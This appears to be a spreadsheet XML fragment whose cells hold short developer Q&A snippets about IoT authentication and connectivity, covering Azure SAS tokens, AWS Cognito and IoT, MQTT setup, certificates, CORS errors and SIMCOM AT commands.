Enable SSL: AT+HTTPSSL=1\r\n
Data transmission
Set bearer profile identifier: AT+HTTPPARA="CID",1\r\n
Set the URL: AT+HTTPPARA="URL","YourURL"\r\n
Set the shared access signature: AT+HTTPPARA="USERDATA","Authorization: YourSharedAccessSignature"\r\n
Set Content-Type field in the HTTP header: AT+HTTPPARA="CONTENT","application/json"\r\n
Set the JSON string to be sent: AT+HTTPDATA=StringLength,20000\r\nYourJSONString
HTTP POST: AT+HTTPACTION=1\r\n</t>
  </si>
  <si>
    <t>The Identity Pool has an Auth Role I will just call "MyAuthRole" and when I go to IAM, that role has two policies attached: One is the default policy:
and the second is a policy for IOT access:
Next I have python code to use my AWS IAM account credentials (access key and secret key) to get a temporary auth token like this:
auth_data = { 'USERNAME':username , 'PASSWORD':password }
provider_client=boto3.client('cognito-idp', region_name=region)
resp = provider_client.admin_initiate_auth(UserPoolId=user_pool_id, AuthFlow='ADMIN_NO_SRP_AUTH', AuthParameters=auth_data, ClientId=client_id)
id_token=resp['AuthenticationResult']['IdToken']
Finally I try to use this token to connect to AWS IOT, using this function:
def _get_aws_cognito_temp_credentials(aws_access_key_id=None,aws_secret_access_key=None,
                region_name='us-west-2',account_id=None,user_pool_id=None,
                identity_pool_id=None,id_token=None):
    boto3.setup_default_session(aws_access_key_id=aws_access_key_id,
                aws_secret_access_key=aws_secret_access_key,
                region_name = region_name)
    identity_client = boto3.client('cognito-identity', region_name=region_name)
    loginkey = "cognito-idp.%s.amazonaws.com/%s" % (region_name,user_pool_id)
    print("loginkey is %s" % loginkey)
    loginsdict={
        loginkey: id_token
    }
    identity_response = identity_client.get_id(AccountId=account_id,
                IdentityPoolId=identity_pool_id,
                Logins=loginsdict)
    identity_id = identity_response['IdentityId']
    #
    # Get the identity's credentials
    #
    credentials_response = identity_client.get_credentials_for_identity(
                IdentityId=identity_id,
                Logins=loginsdict)
    credentials = credentials_response['Credentials']
    access_key_id = credentials['AccessKeyId']
    secret_key = credentials['SecretKey']
    service = 'execute-api'
    session_token = credentials['SessionToken']
    expiration = credentials['Expiration']
    return access_key_id,secret_key,session_token,expiration
Finally I create the AWS IOT client and try to connect like this:
myAWSIoTMQTTClient = AWSIoTMQTTClient(clientId, useWebsocket=True)
myAWSIoTMQTTClient.configureEndpoint(host, port)
myAWSIoTMQTTClient.configureIAMCredentials(temp_access_key_id,
                        temp_secret_key,
                        temp_session_token)
myAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)
myAWSIoTMQTTClient.configureOfflinePublishQueueing(-1)
myAWSIoTMQTTClient.configureDrainingFrequency(2)
myAWSIoTMQTTClient.configureConnectDisconnectTimeout(10)
myAWSIoTMQTTClient.configureMQTTOperationTimeout(5)
log.info("create_aws_iot_client", pre_connect=True)
myAWSIoTMQTTClient.connect()
log.info("create_aws_iot_client", post_connect=True, myAWSIoTMQTTClient=myAWSIoTMQTTClient)
The problem is that it gets to pre_connect and then just hangs and eventually times out.</t>
  </si>
  <si>
    <t>SOAP message senders can use security context tokens to sign and/or encrypt a series of SOAP messages, known as a conversation, between a SOAP message sender and the target Web service.</t>
  </si>
  <si>
    <t>Note: 
If the request does not include an Accept-Encoding field, and if the "identity" content-coding is unavailable, then content-codings commonly understood by HTTP/1.0 clients (i.e., "gzip" and "compress") are preferred; some older clients improperly display messages sent with other content-codings.</t>
  </si>
  <si>
    <t>When a client connects to the message broker using a client ID that another client is using, a CONNACK message will be sent to both clients and the currently connected client will be disconnected.</t>
  </si>
  <si>
    <t>The line: client.sendEvent(message, printResultFor('send'));
After this, on the debugging console I get the message:
\NodejsWebApp1\node_modules\azure-iot-device\lib\client.js:596
return new Client(new transportCtor(authenticationProvider), null, new blob_upload_1.BlobUploadClient(authenticationProvider));
                          ^
TypeError: transportCtor is not a function
    at Function.Client.fromConnectionString 
(C:\Users\InterestedGuy\source\repos\NodejsWebApp1\NodejsWebApp1\node_modules\azure-iot-device\lib\client.js:596:27)
    at sendmsg (C:\Users\InterestedGuy\source\repos\NodejsWebApp1\NodejsWebApp1\server.js:123:32)
    at Server.</t>
  </si>
  <si>
    <t>HTTP: 
HTTPS: HTTP | TLS/SSL | TCP | lower-layer-protocols
HTTP uses the client/server computing model (client-server), where a client makes a request of a server for access to a file or to pass a message to a program that runs in the server computer.</t>
  </si>
  <si>
    <t>3 common scenarios in which ADAL can be used for authenticating a client that accesses a remote resource:
Authenticating users of a native client application running on a device
Authenticating a confidential client application running on a web server
Authenticating a confidential client application running on a server, on behalf of a user
Useful Resources:
ADAL
Code samples</t>
  </si>
  <si>
    <t>But since you asked for "hacky ways" there is a way to detect when any device subscribes and unsubscribes from a topic using the message data from  AWS Reserved Topics - specifically these topics below:
You could create an IoT rule to forward all  and unsubscribed events from those reserved topics to S3, DynamoDB or RDS to be queryable.</t>
  </si>
  <si>
    <t>Error=Connection timed out(110)"
  },
  {
    "timestamp": "2016-10-22T03:59:36.182Z",
    "message": "Token auth succeeded: ClientID='d:123456:testDeviceType:testDeviceId', ClientIP=127.0.0.1"
  }
]
Subscribing to the monitoring topic with an api key:
topic = iot-2/type/+/id/+/mon
Message Payload:
RCV [iot-2/type/testDeviceType/id/testDeviceId/mon][retained]{"Action":"Connect","Time":"2016-11-01T14:18:36.550Z","ClientAddr":"127.0.0.1","ClientID":"d:123456:testDeviceType:testDeviceId","Port":8883,"Secure":true,"Protocol":"mqtt4","Durable":false }
As mentioned in the question, it could always be specified in message payload but maybe there are some reasons not to trust this information being published by the device?</t>
  </si>
  <si>
    <t>For those seeing this question for the first time, I've created a C#-based code sample that shows you how to associate OpenSSL self-signed and self-generated X509 certs with a device registered in Azure IoT Hub, and then use the certs (primary or secondary) in subsequent runtime operations - specifically sending a telemetry message.</t>
  </si>
  <si>
    <t>As far as i know, currently IoT edge does not support proxy.With out http proxy support in azure-iot-sdk-csharp device sdk, Azure/iot-edge cannot communicate using AMQP_WS over HTTP proxies.</t>
  </si>
  <si>
    <t>I'm following this tutorial:
https://docs.microsoft.com/en-us/azure/iot-accelerators/iot-accelerators-remote-monitoring-customize
When I run npm start, I get these messages in the browser console:
Failed to load resource: the server responded with a status of 401 (Unauthorized)
Access to XMLHttpRequest at 'https://{your solution name}.azurewebsites.net//config/v1/solution-settings/theme' from origin 'http://localhost:3000' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.</t>
  </si>
  <si>
    <t>Mechanism description :
When challenged by an HTTP server sending a WWW-Authenticate header with a realm challenge, the HTTP client must send a new request including an Authorization header containing the user's credentials encoded in base64.</t>
  </si>
  <si>
    <t>At the end of the device registration process you have been provided with below information: 
Organization ID: xxxxxx (has six chars)
Device Type: xxxxxxxxxxx (value of your choice)
Device ID:xxxxxxxxxxxx (value of your choice)
Username: use-token-auth
Token: xxxxxxxxxxxx (value of your choice or automatically generated)
When you connect, you need to provide the hostname, which as per: 
https://console.bluemix.net/docs/services/IoT/reference/security/connect_devices_apps_gw.html#connect_devices_apps_gw
is: orgId.messaging.internetofthings.ibmcloud.com
so, with the Organization ID provided at the end of device registration this would become: xxxxxx.messaging.internetofthings.ibmcloud.com
If you want to connect as device, the clientID will have the format: d:orgId:deviceType:deviceId
The orgId, deviceType, deviceId are provided at the end of registration process and deviceType, deviceId are created based on your choice.</t>
  </si>
  <si>
    <t>");
With my Arduino a got following return:
HTTP/1.1 401 Unauthorized
Content-Length: 0
Connection: close
WWW-Authenticate: Basic realm=XBMC
Date: Fri, 06 Jun 2014 21:33:24 GMT
I can make a GET request to Google with my Arduino so it's really XBMC that for some reason does not accept my GET request.</t>
  </si>
  <si>
    <t>4- you can buy a Dongle usb for the previous purpose like (sindbad protection)
5- Encrypt the remaining part of your PHP files for less secure to prevent the read of them using one of those tools
A) free and working PHP obfuscators:
http://www.pipsomania.com/best_php_obfuscator.do 
http://www.phpprotect.info/ 
B) Encode the source files by one of them:
http://php.net/manual/en/function.blenc-encrypt.php
http://www.showmycode.com/
http://phpshadow.com/
http://dezender.net/
http://www.zend.com/en/products/zend-guard
http://www.ioncube.com/php_encoder.php
P.S : 
please read this article about the use of php</t>
  </si>
  <si>
    <t>update
this is the HTML which the server responded:
HTTP/1.1 200 OK
Server: HTTP Appgw
Content-Type: text/html
Content-Length: 325
&lt;HTML&gt;
&lt;HEAD&gt;
    &lt;TITLE&gt; Web Authentication Redirect&lt;/TITLE&gt;
    &lt;META http-equiv="Cache-control" content="no-cache"&gt;
    &lt;META http-equiv="Pragma" content="no-cache"&gt;
    &lt;META http-equiv="Expires" content="-1"&gt;
    &lt;META http-equiv="refresh"
        content="1; URL=https://wlan.XXXX.edu.tw/login.html?redirect=wlan.XXXX.edu.tw/login.html"&gt;
&lt;/HEAD&gt;
&lt;/HTML&gt;</t>
  </si>
  <si>
    <t>The list of certificate policy variables is at https://docs.aws.amazon.com/iot/latest/developerguide/cert-policy-variables.html</t>
  </si>
  <si>
    <t>Here is the connection documentation
https://cloud.google.com/iot/docs/how-tos/mqtt-bridge
Update
I made a quick java example to see if I can connect going off the example they have for connecting and I get a MqttException saying Bad user name or password (4)
Here is the code for that
private void doStuff(){
        String clientId = String.format("ssl://%s:%s", "mqtt.googleapis.com", 8883);
        String mqttClientId = String.format("projects/%s/locations/%s/registries/%s/devices/%s","{project_id}", "us-central1", "{register}", "{device}");
        MqttConnectOptions connectOptions = new MqttConnectOptions();
        connectOptions.setMqttVersion(MqttConnectOptions.MQTT_VERSION_3_1_1);
        Properties sslProps = new Properties();
        sslProps.setProperty("com.ibm.ssl.protocol", "TLSv1.2");
        connectOptions.setSSLProperties(sslProps);
        connectOptions.setUserName("unused");
        try{
            String jwt = createJwtRsa("{project-id}");
            connectOptions.setPassword(jwt.toCharArray());
            MqttClient client = new MqttClient(clientId, mqttClientId, new MemoryPersistence());
            while(!client.isConnected()){
                try{
                    client.connect(connectOptions);
                }catch (MqttException e) {
                    e.printStackTrace();
                }
            }
            Log.d("","");
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    private String createJwtRsa(String projectId) throws Exception {
        DateTime now = new DateTime();
        JwtBuilder jwtBuilder =
                Jwts.builder().setIssuedAt(now.toDate()).setExpiration(now.plusDays(1000000).toDate()).setAudience(projectId);
        byte[] keyBytes = readBytes(getAssets().open("rsa_private_pkcs8"));
        PKCS8EncodedKeySpec spec = new PKCS8EncodedKeySpec(keyBytes);
        KeyFactory kf = KeyFactory.getInstance("RSA");
        PrivateKey k = kf.generatePrivate(spec);
        return jwtBuilder.signWith(SignatureAlgorithm.RS256, k).compact();
    }
As you can see here I have the IoT service acount added to IAM
Does that mean my keys that I generated with openssl are incorrect?</t>
  </si>
  <si>
    <t>I'm using Iot Edge transparent gateway + downstream device and I got this error: Connection error to Iot Hub:TLS authentication error
I follow this tutorial: https://docs.microsoft.com/en-ca/azure/iot-edge/how-to-create-transparent-gateway
My edge and downstream devices are on the same computer, following this scenario:
I deployed a monitoring module that loop through downstream devices to save their sensors in IoT Hub is working (Connection string without GatewayHostName).</t>
  </si>
  <si>
    <t>CORS (https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a way that servers can tell browsers to relax the same-origin policy
 and allow frontend  code to access cross-origin responses.</t>
  </si>
  <si>
    <t>To do this:
Create an IoT policy (IoT Core &gt; Secure &gt; Policies &gt; Create)
Give the policy the permissions you want any user attached to that policy to have, from your code as shared that would mean just copying the second IAM policy.</t>
  </si>
  <si>
    <t>I have some problem with this project https://github.com/debsahu/ESP-MQTT-AWS-IoT-Core: if I use the AWS certificates everything works good, but if I use certificates created with openssl, the code return this error: "failed, reason -&gt; Connection Accepted &lt; try again in 5 seconds"
To create the intermediate certificate (best practise for aws) i used this guide: https://jamielinux.com/docs/openssl-certificate-authority/introduction.html
In file secret.h I put the certificates created with openssl: private  key, device certificate and CA certificate.</t>
  </si>
  <si>
    <t>SET
                name_usr = :name,
                surname_usr = :surname,
                email_usr = :email,
                password_usr = :password";
        $stmt = $this-&gt;conn-&gt;prepare($query);
        $this-&gt;name_usr=htmlspecialchars(strip_tags($this-&gt;name_usr));
        $this-&gt;surname_usr=htmlspecialchars(strip_tags($this-&gt;surname_usr));
        $this-&gt;email_usr=htmlspecialchars(strip_tags($this-&gt;email_usr));
        $this-&gt;password_usr=htmlspecialchars(strip_tags($this-&gt;password_usr));
        $stmt-&gt;bindParam(':name', $this-&gt;name_usr);
        $stmt-&gt;bindParam(':surname', $this-&gt;surname_usr);
        $stmt-&gt;bindParam(':email', $this-&gt;email_usr);
        $password_hash = password_hash($this-&gt;password_usr, PASSWORD_BCRYPT);
        $stmt-&gt;bindParam(':password', $password_hash);
        if($stmt-&gt;execute()){
            return true;
        }
        return false;
    }
}
?&gt;
And I create the class to create user (create_user.php) like so:
&lt;?php
header("Access-Control-Allow-Origin: http://localhost/api3/");
header("Content-Type: application/json; charset=UTF-8");
header("Access-Control-Allow-Methods: POST");
header("Access-Control-Max-Age: 3600");
header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With");
include_once 'config/database.php';
include_once 'objects/user.php';
$database = new Database();
$db = $database-&gt;getConnection();
$user = new User($db);
$data = json_decode(file_get_contents("php://input"));
$user-&gt;name_usr = $data-&gt;name;
$user-&gt;surname_usr = $data-&gt;surname;
$user-&gt;email_usr = $data-&gt;email;
$user-&gt;password_usr = $data-&gt;password;
if ($user-&gt;create()) {
    http_response_code(200);
    echo json_encode(array("message" =&gt; "User was created.</t>
  </si>
  <si>
    <t>This is the error message I get 
Before I tried that, I tried to use the policy "service" (because that token should be used by the backend service) which didn't work either: 
az iot hub generate-sas-token -d device1 -n iothubname --policy service
{u'ExceptionMessage': u'Tracking ID:&lt;&gt;TimeStamp:01/01/2019 14:37:39', u'Message': u'ErrorCode:IotHubUnauthorizedAccess;Unauthorized'}
The only thing that works is az iot hub generate-sas-token -n iothubname but regarding the documentation this creates a token with the iothubowner policy which I don't want to give my backend service.</t>
  </si>
  <si>
    <t>Useful Links
Authorize.Net's Webhooks Documentation
Development Center
Related Tags
authorize.net
authorize.net-arb
authorize.net-aim
authorize.net-cim</t>
  </si>
  <si>
    <t>So, this are my commands in the serial monitor:
This is my header:
This is the header response with requestmaker.com:
HTTP/1.1 200 OK
Date: Tue, 21 Mar 2017 23:23:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 2c8d35a7a44ec64045f1059343a72b44
&lt;p&gt;EXITO : Se ha logrado escribir en el documento, data =1234&lt;/p&gt;</t>
  </si>
  <si>
    <t>The cloud supports HTTP protocol using a REST API for both uplink/downlink so I think it will work with AWS IoT as the [link]: https://docs.aws.amazon.com/iot/latest/developerguide/protocols.html#http
I wanna send a HTTP request using AWS Sig v4 with the Authentication as the form below:
AWS4-HMAC-SHA256 Credential={1}/{2}/{3}/{4}/aws4_request, SignedHeaders=content-type;host;x-amz-date, Signature={5}
However, I don't know how to generate the signature {5}.</t>
  </si>
  <si>
    <t>The dates may vary for npm packages for Node.js
11/12/2018: 4.2.0
05/11/2018: 4.1.5
31/10/2018: 4.1.0
22/09/2018: 4.0.6 (1st stable v4) 
26/07/2017: 3.9.0 (minimum working version due to security reasons)
10/05/2017: 3.8.0
05/01/2017: 3.5.0
08/07/2016: 3.0.0
30/03/2016: 1.0.0
Resources
Documentation and main SDK
Microsoft Bot Framework Developer Portal
Documentation
Roadmap for .Net version
Bot Builder SDK v4 for .Net
Bot Builder SDK v4 for JavaScript
Bot Builder SDK v4 for Python
Bot Builder SDK v4 for Java
Bot Builder SDK v3 for .Net and Node.js
Azure Bot Service
Related SDKs and tooling
Debug bots with the Bot Framework Emulator
Emulator project (Github)
Bot Builder Azure Extensions for .Net
Webchat control (Github)
Samples
Samples in main SDK
Samples for v3 - .Net and Node.js</t>
  </si>
  <si>
    <t>The example in cURL is:
curl --header 'Access-Token: &lt;your_access_token_here&gt;' \
     --data-urlencode active="true" \
     --data-urlencode modified_after="1.4e+09" \
     --get \
     https://api.pushbullet.com/v2/pushes
And my attempt to get it working is:
  String request = String("GET ") + url +" HTTP/1.1\r\n" +
                   "Host: " + push_bullet_host + "\r\n" +
                   "User-Agent: ESP8266/NodeMCU 0.9\r\n" +
                   "Accept: */*\r\n" +
                   "active=\"true\"\r\n" +
                   "modified_after=\"1496508764\"\r\n" +
                   "Access-Token: "+ api_token +"\r\n\r\n";
  secure_client.print(req);
But all I receive is the following:
&gt;&gt;HTTP/1.1 200 OK&gt;&gt;
X-Ratelimit-Reset: 1496515364&gt;&gt;
Content-Type: application/json; charset=utf-8&gt;&gt;
X-Ratelimit-Limit: 16384&gt;&gt;
X-Ratelimit-Remaining: 16384&gt;&gt;
X-Cloud-Trace-Context: blablalba&gt;&gt;
Date: Sat, 03 Jun 2017 18:05:06 GMT&gt;&gt;
Server: Google Frontend&gt;&gt;
Content-Length: 13626&gt;&gt;
I really appreciate any idea or solution.</t>
  </si>
  <si>
    <t>api_scopes = ['https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/cloudiot']
    api_version = 'v1'
    discovery_api = 'https://cloudiot.googleapis.com/$discovery/rest'
    service_name = 'cloudiotcore'
def request_posted(event, context):</t>
  </si>
  <si>
    <t>I have successfully created an SSL certificate and have the correct files .pem, .csr (and .csr)
I believe I have copied these to the correct locations: /etc/ssl/private and /etc/ssl/certs respectively.</t>
  </si>
  <si>
    <t>Here is my program snippet (Java)
This gives me the same error - 
--------- Request headers ---------
x-amz-content-sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Authorization: AWS4-HMAC-SHA256 Credential=fasfasfasdfsdafs/20160212/us-east-1/iot/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=3b2194051a8dde8fe617219c78c2a79b77ec92338028e9e917a74e8307f4e914
x-amz-date: 20160212T182525Z
Host: dasfsdfasdf.iot.us-east-1.amazonaws.com
--------- Response content ---------
{"message":"Credential should be scoped to correct service.</t>
  </si>
  <si>
    <t>In order to make it work:
git clone TSS.MSR and azure-iot-sdk-csharp
in /TSS.NET/TSS.Net/TSS.Net.csproj change this:
to this
Reference the TSS.Net.csproj in Microsoft.Azure.Devices.Provisioning.Security.Tpm
Reference Microsoft.Azure.Devices.Provisioning.Security.Tpm.csproj in your project, instead of the NuGet package
dotnet build --runtime linux-arm --configuration Release</t>
  </si>
  <si>
    <t>UPDATE 2:
Here are some links that I trying to use:
Use Azure IoT Hub without client libraries (MQTT)
Sending Device-to-Cloud (D2C) Messages
sankarcheppali gitHub with samples
Here is official Link
Communicate with your IoT hub using the MQTT protocol
 that tells:
To use the MQTT protocol directly, your client must connect over
  TLS/SSL.</t>
  </si>
  <si>
    <t>This client comes with an OAuth2 client that allows you to retrieve an access token and refreshes the token and re-try the request seamlessly if token is expired.</t>
  </si>
  <si>
    <t>{StatusCode: 415, ReasonPhrase: 'Unsupported Media Type', Version: 1.1, Content: System.Net.Http.StreamContent, Headers:
  {
    x-ms-request-id: 6475343d-5a2e-407a-9e7f-896e0c489307
    Strict-Transport-Security: max-age=31536000; includeSubDomains
    Date: Thu, 28 Feb 2019 11:42:59 GMT
    Content-Length: 0
  }}
Looking forward for the help ...</t>
  </si>
  <si>
    <t>After that I get my JSON Data
I use this: https://github.com/Kynec/digest-ajax
and this is my code:
Access to XMLHttpRequest at 'https://user:pass@192.168.0.100/x' from origin 'http://192.168.0.111' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.</t>
  </si>
  <si>
    <t>Here is the output/error
{ keyPath: './certs/xxxxxxxxxx-private.pem.key',
  certPath: './certs/xxxxxxxxxx-certificate.pem.crt',
  caPath: './certs/root-CA.crt',
  clientId: 1,
  debug: true,
  host: 'xxxxxxxxxx.iot.xxxxxxxxxx.amazonaws.com',
  keepalive: 300,
  username: '?SDK=JavaScript&amp;Version=2.2.0',
  reconnectPeriod: 1000,
  fastDisconnectDetection: true,
  resubscribe: false,
  protocol: 'mqtts',
  port: 8883,
  key: &lt;Buffer 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 45 70 41 49 42 41 41 4b 43 41 51 45 41 32 42 ... &gt;,
  cert: &lt;Buffer 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 4d 49 49 44 57 54 43 43 41 6b 47 67 41 77 49 42 41 67 49 55 53 33 ... &gt;,
  ca: &lt;Buffer 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0d 0a 4d 49 49 45 30 7a 43 43 41 37 75 67 41 77 49 42 41 67 49 51 47 ... &gt;,
  requestCert: true,
  rejectUnauthorized: true }
attempting new mqtt connection...
net.js:617
    throw new TypeError('invalid data');
    ^
TypeError: invalid data
    at TLSSocket.Socket.write (net.js:617:11)</t>
  </si>
  <si>
    <t>You can also implement authentication mechanism using Cognito Federated Pool with proper IAM policy and use  variable in your IoT policy with proper permissions (just remember to attach this policy to your Cognito identityId).</t>
  </si>
  <si>
    <t>CORS-enabling a server never causes the server itself to block any requests; instead, a CORS-enabled server just sends back additional  response headers, and the browser uses the values of those headers to determine if the browser will allow frontend code running at a particular origin to access responses from that server.</t>
  </si>
  <si>
    <t>I've been able to using the openssl tool from the 
openssl s_client -connect {my-gateway-machine-name-dns-name}.centralus.cloudapp.azure.com:8883 -CAfile /certs/certs/azure-iot-test-only.root.ca.cert.pem -showcerts
Downstream device running on Linux VM with Certs installed and verified.</t>
  </si>
  <si>
    <t>I am trying to use Azure Iot hub REST API to create device by following links
Create a new device identity
Control access to IoT Hub
And my http data is like
My header is like 
But i get error 401 
{"Message":"ErrorCode:IotHubUnauthorizedAccess;Unauthorized","ExceptionMessage":"Tracking ID:(tracking id )-TimeStamp:12/14/2016 03:15:17"}
Anyone know how to fixed it , or to track the exceptionMessage ?</t>
  </si>
  <si>
    <t>I get "amqp:unauthorized-access" error due to without sending put-token message:
I test on Windows 10 desktop with the following code, it works for both sending and receiving:
For more information you can reference "CONNECTING TO THE AZURE IOT HUB USING AN AMQP STACK".</t>
  </si>
  <si>
    <t>I have followed the documentation at https://github.com/Azure/amqpnetlite/blob/master/docs/articles/building_application.md#specifying-an-address together with the indications on https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-devguide-security#protocol-specifics , but i keep getting some unauthenticated error with code "Sys".</t>
  </si>
  <si>
    <t>Attempting to connect to SSID: ********
Connected to wifi
Request timestamp
HTTP/1.1 302 Found
Location: http://www.google.de/?gws_rd=cr&amp;ei=Gm5IUvXHEbeg4AON9YCwCw
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=9684aab183999fb2:FF=0:TM=1380478490:LM=1380478490:S=EnaD0yx20-9BT6-4; expires=Tue, 29-Sep-2015 18:14:50 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=R6OUfZAakXBBYSp_a9QRO56OzZxYS2X6RmpFlByzSOMgVXalyfYOuilvzQZjaNPRK9409kjjPsDIOEI4h44qIfljzYfS_57MrsQNaKp8S35iMUHKkgLwrkgGs7dRy6gQ; expires=Mon, 31-Mar-2014 18:14:50 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP="This is not a P3P policy!</t>
  </si>
  <si>
    <t>When I'm creating a certificate for my server with Let's Encrypt I get cert.pem, chain.pem, fullchain.pem, privkey.pem.</t>
  </si>
  <si>
    <t>generated SAS token for device: you can use Device Explorer to generate the token.Please refer to the step 2 in this article(Sending events to IOT Hub over HTTP via REST).</t>
  </si>
  <si>
    <t>I am trying, in order to simulate a device, to send a message to an existing IoT-Hub following this procedure: https://www.codeproject.com/Articles/1113447/Azure-IOT-Hub-REST-API
I am able to successfully create my shared access signature using the Device Explorer.</t>
  </si>
  <si>
    <t>What is the approach to be followed (on the device) if we have to publish events to cloud and subscribe for MQTT messages on the Device at the same time using the auth-token provided by the Watson IoT platform.</t>
  </si>
  <si>
    <t>As for AMQP and HTTP, the device connection is not severed by IoT Hub immediately, for AMQP, about 10 minutes after the token expires you will get .</t>
  </si>
  <si>
    <t>Related Tags
authorize.net
authorize.net-aim
authorize.net-cim
authorize.net-webhooks</t>
  </si>
  <si>
    <t>HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:421) ~[tomcat-embed-core-8.5.11.jar!/:8.5.11] (rest of the stack trace)
As I mentioned above, I am not using HTTPS in either Spring Boot or the Raspberry Pi.</t>
  </si>
  <si>
    <t>Either way you choose, dont forget to copy the manually (or automatically) fetched Lets Encrypt certificates from 
/srv/dehydrated/certs/{{ gitlab_domain }}/fullchain.pem
to 
/etc/gitlab/ssl/{{ gitlab_domain }}.crt
and
/srv/dehydrated/certs/{{ gitlab_domain }}/privkey.pem 
to 
/etc/gitlab/ssl/{{ gitlab_domain }}.key
Gitlab will pick them up from there automatically for you, as the docs state in the way to manually configure HTTPS</t>
  </si>
  <si>
    <t>You need to use the argument "USERDATA" and the command will look like this:
AT+HTTPPARA="USERDATA","Authorization: YourSharedAccessSignature"\r\n
The commands I use to send data to Azure via HTTPS with SIMCOM modules are:
Initialization
Set context type: AT+SAPBR=3,1,"CONTYPE","GPRS"\r\n
Set APN: AT+SAPBR=3,1,"APN","YourAPN"\r\n
Open bearer: AT+SAPBR=1,1\r\n
Query bearer: AT+SAPBR=2,1\r\n
Enable HTTP functions: AT+HTTPINIT\r\n
Enable SSL: AT+HTTPSSL=1\r\n
Data transmission
Set bearer profile identifier: AT+HTTPPARA="CID",1\r\n
Set the URL: AT+HTTPPARA="URL","YourURL"\r\n
Set the shared access signature: AT+HTTPPARA="USERDATA","Authorization: YourSharedAccessSignature"\r\n
Set Content-Type field in the HTTP header: AT+HTTPPARA="CONTENT","application/json"\r\n
Set the JSON string to be sent: AT+HTTPDATA=StringLength,20000\r\nYourJSONString
HTTP POST: AT+HTTPACTION=1\r\n</t>
  </si>
  <si>
    <t>With the new c# SDK version, 
Microsoft.Azure.Devices.Client 1.17.1
IoTHub stops accepting token for MQTT in 10 min after SAS expiry time set by user, which is consistent with AMQP behaviour.</t>
  </si>
  <si>
    <t>If the original response was cacheable and contained a valid Last-Modified response header (a RFC 822 datetime), the user agent (browser) may send this datetime with the next request (this is one of the "cache revalidation" mechanisms of HTTP); if the resource was not modified, the server should respond with a 304 Not Modified instead of sending the content body - which is then served from client's cache.</t>
  </si>
  <si>
    <t>Related Tags
authorize.net
authorize.net-arb
authorize.net-aim
authorize.net-webhooks</t>
  </si>
  <si>
    <t>The powershell command file generates certificate chain something like this RootCA-&gt;intermediate 1-&gt;intermediate 2-&gt;intermediate 3
so intermediate certificate 3 is signed by intermediate 2 which is signed by intermediate 1 and then it is signed by Root
Also all the device certificates are signed by root CA (Root CA-&gt; leaf certificate) hence you are getting error "the intermedite certificate does not match the signing certificate".</t>
  </si>
  <si>
    <t>I already tried generating signed X.509 certificates like this:
   openssl req -new -days 365 -key device.key -out device.csr 
   openssl x509 -req -days 365 -in device.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out device.crt
Notice that when promtped I put additional subj information like name, country, email, organisation which according to other SO question should make it work.</t>
  </si>
  <si>
    <t>Please take a look here: https://azure.microsoft.com/documentation/articles/iot-hub-sas-tokens/#using-security-tokens-from-service-components
This article explains how you can generate the security token you need - in particular the section "Using security tokens from service components".</t>
  </si>
  <si>
    <t>Azure IoT Hub supports MQTT, AMQP, and HTTPS, these supported protocols transports tokens in different ways.HTTPS implements authentication by including a valid token in the Authorization request header.</t>
  </si>
  <si>
    <t>You can refer link below to see the SDK check the response and generate the SAS token by the key return by the response:
TpmDelegatingHandler#L27L64 
I would suggest you using Azuire IoT Device Provision Service SDK if it possible since it is real convent for developers.</t>
  </si>
  <si>
    <t>To troublshoot further, I've written a plain old Console app using System.Net.Http.HttpClient, attached the client certificate to the request and everything works great.</t>
  </si>
  <si>
    <t>Publish
Subscribe
mqtt sub -h orgId.messaging.internetofthings.ibmcloud.com -p 443 -l wss -i a:orgId:default_mobile -u API-key -P 'API-token' --ca messaging.pem -t iot-2/type/mobile/id/default_mobile/evt/live/fmt/json
For subscription, I have created API keys and am using the same.</t>
  </si>
  <si>
    <t>Available Options
Streaming
Forms
HTTP Authentication
Custom HTTP Headers
OAuth Signing
Proxies
Unix Domain Sockets
TLS/SSL Protocol
Support for HAR 1.2
Request in GitHub
Request in npm</t>
  </si>
  <si>
    <t>So to publish/subscribe an event on behalf of a device you would use a topic such as:
publish to iot-2/type/myType/id/myDevice/evt/statusEvent/fmt/json
When you connect as a device you have device-scope only (this is a security mechanism to limit the damage a compromised device can do).</t>
  </si>
  <si>
    <t>I'm also testing Microsoft samples for connecting wireless and i observed this behave happens in Microsoft sample when you try to connect to a network that you already connected it crashes without any exception
 https://github.com/ms-iot/samples/tree/develop/WiFiConnector/CS
To Summurize; With following code if call firstAdapter.ConnectAsync() without credentials its normal but if call it with credentials program goes off from screen even without exception.</t>
  </si>
  <si>
    <t xml:space="preserve">
It is important to note that Edge hub provides at-least-once
  guarantees, which means that messages are stored locally in case a
  route cannot deliver the message to its sink, for example, the Edge
  hub cannot connect to IoT Hub, or the target module is not connected.</t>
  </si>
  <si>
    <t>The SAS password is generated using Microsoft Device Explorer (https://github.com/Azure/azure-iot-sdk-csharp/tree/master/tools/DeviceExplorer) so providing the right read/write connection details along with an expiry date in the future, I am assuming it is correct and valid.</t>
  </si>
  <si>
    <t>client = mqtt.Client()
client.on_connect = on_connect
